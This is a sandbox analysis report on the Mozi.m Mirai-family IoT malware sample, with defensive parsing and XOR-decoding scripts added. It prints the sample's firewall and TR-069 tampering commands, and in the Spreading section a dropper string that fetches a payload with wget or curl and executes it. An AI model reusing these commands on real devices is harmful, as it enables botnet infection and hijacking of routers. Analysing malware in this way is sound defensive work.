Analysis Report Mozi.m

Overview

General Information

Sample Name:Mozi.m
Analysis ID:336612
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai (three rule matches: JoeSecurity_Mirai_4, JoeSecurity_Mirai_8, JoeSecurity_Mirai_9)
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Startup

  • system is lnxubuntu1
  • Mozi.m (PID: 4564, Parent: 4517, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/Mozi.m
    • Mozi.m New Fork (PID: 4578, Parent: 4564)
      • Mozi.m New Fork (PID: 4580, Parent: 4578)
        • Mozi.m New Fork (PID: 4582, Parent: 4580)
        • sh (PID: 4582, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4584, Parent: 4582)
          • killall (PID: 4584, Parent: 4582, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • Mozi.m New Fork (PID: 4601, Parent: 4580)
        • Mozi.m New Fork (PID: 4602, Parent: 4580)
        • Mozi.m New Fork (PID: 4603, Parent: 4580)
          • Mozi.m New Fork (PID: 4616, Parent: 4603)
          • sh (PID: 4616, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4618, Parent: 4616)
            • iptables (PID: 4618, Parent: 4616, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
              • iptables New Fork (PID: 4622, Parent: 4618)
              • modprobe (PID: 4622, Parent: 4618, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • Mozi.m New Fork (PID: 4650, Parent: 4603)
          • sh (PID: 4650, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4652, Parent: 4650)
            • iptables (PID: 4652, Parent: 4650, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4653, Parent: 4603)
          • sh (PID: 4653, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4655, Parent: 4653)
            • iptables (PID: 4655, Parent: 4653, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4689, Parent: 4603)
          • sh (PID: 4689, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4699, Parent: 4689)
            • iptables (PID: 4699, Parent: 4689, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4702, Parent: 4603)
          • sh (PID: 4702, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 56870 -j ACCEPT"
            • sh New Fork (PID: 4708, Parent: 4702)
            • iptables (PID: 4708, Parent: 4702, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4728, Parent: 4603)
          • sh (PID: 4728, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT"
            • sh New Fork (PID: 4736, Parent: 4728)
            • iptables (PID: 4736, Parent: 4728, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4739, Parent: 4603)
          • sh (PID: 4739, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT"
            • sh New Fork (PID: 4742, Parent: 4739)
            • iptables (PID: 4742, Parent: 4739, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4750, Parent: 4603)
          • sh (PID: 4750, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT"
            • sh New Fork (PID: 4761, Parent: 4750)
            • iptables (PID: 4761, Parent: 4750, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
        • Mozi.m New Fork (PID: 4607, Parent: 4580)
        • Mozi.m New Fork (PID: 4612, Parent: 4580)
        • Mozi.m New Fork (PID: 4614, Parent: 4580)
        • Mozi.m New Fork (PID: 4875, Parent: 4580)
        • sh (PID: 4875, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4877, Parent: 4875)
          • iptables (PID: 4877, Parent: 4875, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4878, Parent: 4580)
        • sh (PID: 4878, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4880, Parent: 4878)
          • iptables (PID: 4880, Parent: 4878, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4881, Parent: 4580)
        • sh (PID: 4881, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4883, Parent: 4881)
          • iptables (PID: 4883, Parent: 4881, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • Mozi.m New Fork (PID: 4885, Parent: 4580)
        • sh (PID: 4885, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4892, Parent: 4885)
          • iptables (PID: 4892, Parent: 4885, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • Mozi.m New Fork (PID: 4912, Parent: 4580)
        • sh (PID: 4912, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • Mozi.m New Fork (PID: 4925, Parent: 4580)
        • sh (PID: 4925, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • Mozi.m New Fork (PID: 4940, Parent: 4580)
        • sh (PID: 4940, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4950, Parent: 4940)
          • iptables (PID: 4950, Parent: 4940, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • Mozi.m New Fork (PID: 4975, Parent: 4580)
        • sh (PID: 4975, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4985, Parent: 4975)
          • iptables (PID: 4985, Parent: 4975, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • Mozi.m New Fork (PID: 5005, Parent: 4580)
        • sh (PID: 5005, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 5011, Parent: 5005)
          • iptables (PID: 5011, Parent: 5005, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • Mozi.m New Fork (PID: 5012, Parent: 4580)
        • sh (PID: 5012, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 5014, Parent: 5012)
          • iptables (PID: 5014, Parent: 5012, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • Mozi.m New Fork (PID: 5015, Parent: 4580)
        • sh (PID: 5015, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 5019, Parent: 5015)
          • iptables (PID: 5019, Parent: 5015, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • Mozi.m New Fork (PID: 5035, Parent: 4580)
        • sh (PID: 5035, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 5044, Parent: 5035)
          • iptables (PID: 5044, Parent: 5035, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • Mozi.m New Fork (PID: 5069, Parent: 4580)
        • sh (PID: 5069, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5079, Parent: 5069)
          • iptables (PID: 5079, Parent: 5069, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • Mozi.m New Fork (PID: 5097, Parent: 4580)
        • sh (PID: 5097, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5105, Parent: 5097)
          • iptables (PID: 5105, Parent: 5097, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • Mozi.m New Fork (PID: 5112, Parent: 4580)
        • sh (PID: 5112, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5121, Parent: 5112)
          • iptables (PID: 5121, Parent: 5112, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • Mozi.m New Fork (PID: 5139, Parent: 4580)
        • sh (PID: 5139, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5144, Parent: 5139)
          • iptables (PID: 5144, Parent: 5139, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • Mozi.m New Fork (PID: 5146, Parent: 4580)
        • sh (PID: 5146, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5152, Parent: 5146)
          • iptables (PID: 5152, Parent: 5146, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • Mozi.m New Fork (PID: 5169, Parent: 4580)
        • sh (PID: 5169, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5183, Parent: 5169)
          • iptables (PID: 5183, Parent: 5169, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • Mozi.m New Fork (PID: 5199, Parent: 4580)
        • sh (PID: 5199, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5201, Parent: 5199)
          • iptables (PID: 5201, Parent: 5199, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5202, Parent: 4580)
        • sh (PID: 5202, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5204, Parent: 5202)
          • iptables (PID: 5204, Parent: 5202, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5205, Parent: 4580)
        • sh (PID: 5205, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5207, Parent: 5205)
          • iptables (PID: 5207, Parent: 5205, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5208, Parent: 4580)
        • sh (PID: 5208, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5211, Parent: 5208)
          • iptables (PID: 5211, Parent: 5208, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5220, Parent: 4580)
        • sh (PID: 5220, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 14165 -j ACCEPT"
          • sh New Fork (PID: 5232, Parent: 5220)
          • iptables (PID: 5232, Parent: 5220, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5254, Parent: 4580)
        • sh (PID: 5254, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT"
          • sh New Fork (PID: 5268, Parent: 5254)
          • iptables (PID: 5268, Parent: 5254, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5290, Parent: 4580)
        • sh (PID: 5290, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT"
          • sh New Fork (PID: 5303, Parent: 5290)
          • iptables (PID: 5303, Parent: 5290, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5326, Parent: 4580)
        • sh (PID: 5326, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT"
          • sh New Fork (PID: 5333, Parent: 5326)
          • iptables (PID: 5333, Parent: 5326, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
  • upstart New Fork (PID: 4794, Parent: 3310)
  • sh (PID: 4794, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4795, Parent: 4794)
    • date (PID: 4795, Parent: 4794, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4796, Parent: 4794)
    • apport-checkreports (PID: 4796, Parent: 4794, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 4821, Parent: 3310)
  • sh (PID: 4821, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4822, Parent: 4821)
    • date (PID: 4822, Parent: 4821, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4823, Parent: 4821)
    • apport-gtk (PID: 4823, Parent: 4821, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 4848, Parent: 3310)
  • sh (PID: 4848, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4849, Parent: 4848)
    • date (PID: 4849, Parent: 4848, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4866, Parent: 4848)
    • apport-gtk (PID: 4866, Parent: 4848, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup
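
The process tree above is the most useful part of this report for a responder: every `/bin/sh -c` line is a firewall or configuration change the sample makes on the infected device. Read together, the iptables calls ACCEPT 56870/tcp and 14165/udp in INPUT/OUTPUT and in the nat PREROUTING/POSTROUTING chains (an ACCEPT in nat PREROUTING means no existing DNAT rule is applied, so the sample's listener stays reachable from the WAN side of a NAT router), while they DROP inbound and outbound 7547/tcp (TR-069 CWMP) plus 35000, 50023 and 58000. Each rule is issued twice, once with the long option spelling and once with the short one (`--destination-port` / `--dport`), apparently to cover iptables builds that reject one of them. The two cfgtool calls rewrite the Huawei TR-069 configuration tree (`hw_ctree.xml`): the ACS URL is pointed at 127.0.0.1 and the ConnectionRequestPassword set to `acsMozi`, which cuts the operator's remote-management channel to the device. The following script is an added example, not part of the report or of the sample: it parses process-tree lines of this format and summarises what the sample opens, blocks, rewrites and kills. The input lines are copied from the tree above (MD5 fields dropped, a representative subset of the iptables calls); the function names are mine.

```python
import re
from collections import defaultdict

# Constructed input: process-tree lines copied from the Startup section above
# (PIDs kept, MD5 fields dropped, representative subset of the iptables calls).
TREE = r'''
sh (PID: 4582, Parent: 4580) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
sh (PID: 4616, Parent: 4603) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT"
sh (PID: 4650, Parent: 4603) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT"
sh (PID: 4653, Parent: 4603) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT"
sh (PID: 4702, Parent: 4603) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 56870 -j ACCEPT"
sh (PID: 4875, Parent: 4580) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
sh (PID: 4912, Parent: 4580) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
sh (PID: 4925, Parent: 4580) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
sh (PID: 4940, Parent: 4580) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
sh (PID: 4975, Parent: 4580) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
sh (PID: 5015, Parent: 4580) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
sh (PID: 5199, Parent: 4580) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT"
sh (PID: 5205, Parent: 4580) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT"
'''

ARGS_RE = re.compile(r'Arguments: /bin/sh -c "(?P<cmd>.*)"\s*$')
IPT_RE = re.compile(
    r'iptables -I (?P<chain>\w+)(?: -t (?P<table>\w+))? -p (?P<proto>tcp|udp) '
    r'--(?:destination-port|dport|source-port|sport) (?P<port>\d+) -j (?P<target>ACCEPT|DROP)$')
# cfgtool set <file> <object> <parameter> \"<value>\"  (quotes are backslash-escaped inside sh -c "...")
CFG_RE = re.compile(r'cfgtool set \S+ (?P<obj>\S+) (?P<param>\S+) \\"(?P<value>[^"\\]*)\\"')


def shell_commands(tree):
    """Every command string the sample handed to `/bin/sh -c`, in tree order."""
    return [m['cmd'] for line in tree.splitlines() if (m := ARGS_RE.search(line))]


def firewall_summary(tree):
    """Ports touched via iptables, grouped by (target, protocol): what is opened vs. what is blocked.
    The long/short option spellings and the filter/nat duplicates collapse into one port entry."""
    ports = defaultdict(set)
    for cmd in shell_commands(tree):
        if (m := IPT_RE.match(cmd)):
            ports[(m['target'], m['proto'])].add(int(m['port']))
    return {k: sorted(v) for k, v in ports.items()}


def tr069_changes(tree):
    """TR-069 (CWMP) parameters the sample rewrites with cfgtool, as {parameter: value}."""
    return {m['param']: m['value'] for cmd in shell_commands(tree) if (m := CFG_RE.match(cmd))}


def killed_processes(tree):
    """Process names the sample kills with `killall -9` (the telnet daemons it locks out)."""
    names = []
    for cmd in shell_commands(tree):
        if cmd.startswith('killall -9 '):
            names.extend(cmd.split()[2:])
    return names


if __name__ == '__main__':
    for (target, proto), plist in sorted(firewall_summary(TREE).items()):
        print(f'{target:6} {proto}: {plist}')
    print('TR-069 rewrites:', tr069_changes(TREE))
    print('killed:', killed_processes(TREE))
```

On a suspected device the same three facts are the things to check directly: `iptables -S INPUT` for ACCEPT rules on 56870/tcp or 14165/udp and DROP rules on 7547/tcp, the ManagementServer URL in the TR-069 configuration, and whether telnetd is still running.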

Yara Overview

Initial Sample

Source    Rule                  Description                                       Author
Mozi.m    SUSP_XORed_Mozilla    Detects suspicious XORed keyword - Mozilla/5.0    Florian Roth
  Strings:
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Mozi.m    JoeSecurity_Mirai_8   Yara detected Mirai                               Joe Security
Mozi.m    JoeSecurity_Mirai_9   Yara detected Mirai                               Joe Security
Mozi.m    JoeSecurity_Mirai_4   Yara detected Mirai                               Joe Security

PCAP (Network Traffic)

Source       Rule                  Description            Author
dump.pcap    JoeSecurity_Mirai_4   Yara detected Mirai    Joe Security

Dropped Files

Source           Rule                  Description                                       Author
/usr/networks    SUSP_XORed_Mozilla    Detects suspicious XORed keyword - Mozilla/5.0    Florian Roth
  Strings (at the same offsets as in the submitted sample):
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
/usr/networks    JoeSecurity_Mirai_8   Yara detected Mirai                               Joe Security
/usr/networks    JoeSecurity_Mirai_9   Yara detected Mirai                               Joe Security
/usr/networks    JoeSecurity_Mirai_4   Yara detected Mirai                               Joe Security
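
The SUSP_XORed_Mozilla hits are worth a minute of arithmetic. The rule matched the same eleven bytes, `oMXKNNC\x0D\x17\x0C\x12`, five times at 0x70-byte spacing, i.e. five entries of a string table that all begin with the User-Agent prefix `Mozilla/5.0`. XORing the matched bytes against that known plaintext gives the same byte, 0x22, at every position, so the table is obfuscated with a single-byte XOR key. 0x22 is exactly what Mirai's table obfuscation reduces to (the four bytes of its 0xDEADBEEF key XOR together to 0x22), which fits the three Mirai rule matches on the same file. The script below is an added example and not code from the report: it recovers the key from the match, checks that the key is constant across the string, and scans a blob for the keyword under every single-byte key. The blob it scans is constructed for the example, not bytes from the sample, and the assumption that the same key covers the rest of the string table should be checked by decoding neighbouring bytes and looking for printable ASCII.

```python
# Added example: recover the single-byte XOR key behind the SUSP_XORed_Mozilla match.
MATCH = b'oMXKNNC\x0d\x17\x0c\x12'   # $xo1 bytes from the Yara match listed above
KEYWORD = b'Mozilla/5.0'             # the plaintext the rule looks for under XOR


def xor_key_stream(cipher, plain):
    """Per-position key bytes under the assumption cipher[i] = plain[i] ^ key[i] (known plaintext)."""
    if len(cipher) != len(plain):
        raise ValueError('known plaintext and ciphertext must have the same length')
    return bytes(c ^ p for c, p in zip(cipher, plain))


def single_byte_key(cipher, plain):
    """The key if every position agrees on one byte (single-byte XOR), otherwise None."""
    stream = xor_key_stream(cipher, plain)
    return stream[0] if len(set(stream)) == 1 else None


def xor_decode(data, key):
    """Apply a single-byte XOR; the operation is its own inverse, so this also encodes."""
    return bytes(b ^ key for b in data)


def find_xored_keyword(blob, keyword):
    """(offset, key) pairs at which `keyword` occurs in `blob` under any single-byte XOR key.
    Key 0 means the keyword is present in the clear."""
    hits = []
    for key in range(256):
        needle = xor_decode(keyword, key)
        start = 0
        while (pos := blob.find(needle, start)) != -1:
            hits.append((pos, key))
            start = pos + 1
    return sorted(hits)


# Constructed blob for the example (not sample bytes): padding, one copy XORed with 0x22,
# six filler bytes, then one plaintext copy.
SAMPLE_BLOB = b'\x00' * 16 + MATCH + b'ABCDEF' + KEYWORD

if __name__ == '__main__':
    key = single_byte_key(MATCH, KEYWORD)
    print(f'key = 0x{key:02x} ({chr(key)!r}) -> {xor_decode(MATCH, key)!r}')
    print(find_xored_keyword(SAMPLE_BLOB, KEYWORD))
```

With the key in hand, decoding the 0x70-byte region around each hit offset in the sample recovers the full User-Agent strings (and, if the key really is table-wide, the rest of the obfuscated string table) without running the binary.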

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Mozi.m, Avira: detected
Antivirus detection for dropped file
Source: /usr/networks, Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: Mozi.m, Virustotal: Detection: 70%
Source: Mozi.m, ReversingLabs: Detection: 68%

Spreading:

Found strings indicative of a multi-platform dropper
Source: Mozi.m, String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
